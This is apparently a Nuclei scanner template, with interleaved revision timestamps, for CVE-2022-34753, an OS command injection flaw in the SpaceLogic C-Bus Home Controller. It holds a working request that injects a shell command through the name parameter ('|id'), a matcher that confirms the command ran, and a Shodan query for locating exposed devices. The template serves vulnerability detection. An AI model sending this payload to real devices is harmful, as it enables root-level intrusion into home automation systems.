2022-07-30 11:24:40 +00:00
id : CVE-2022-34753
info :
name : SpaceLogic C-Bus Home Controller - Remote Code Execution
author : gy741
severity : high
description : |
A CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause remote root exploit when the command is compromised. Affected Products SpaceLogic C-Bus Home Controller (5200WHC2), formerly known as C-Bus Wiser Homer Controller MK2 (V1.31.460 and prior)
reference :
- https://www.zeroscience.mk/codes/SpaceLogic.txt
2023-02-10 10:36:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-34753
2023-02-10 15:06:55 +00:00
- https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf
- http://packetstormsecurity.com/files/167783/Schneider-Electric-SpaceLogic-C-Bus-Home-Controller-5200WHC2-Remote-Root.html
2022-07-30 11:24:40 +00:00
classification :
2023-02-10 15:06:55 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
2022-07-30 11:24:40 +00:00
cve-id : CVE-2022-34753
2023-02-10 15:06:55 +00:00
cwe-id : CWE-78
2023-02-10 10:36:27 +00:00
metadata :
shodan-query : html:"SpaceLogic C-Bus"
2023-02-10 16:02:02 +00:00
tags : cve,cve2022,iot,spacelogic,rce,oast,packetstorm
2022-07-30 11:24:40 +00:00
requests :
- raw :
- |
GET /delsnap.pl?name=|id HTTP/1.1
Host : {{Hostname}}
2023-02-10 10:36:27 +00:00
Authorization : Basic {{base64('{{username}}:' + '{{password}}')}}
2022-07-30 11:24:40 +00:00
matchers-condition : and
matchers :
2023-02-10 10:36:27 +00:00
- type : regex
regex :
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
2022-07-30 11:24:40 +00:00
- type : status
status :
- 200
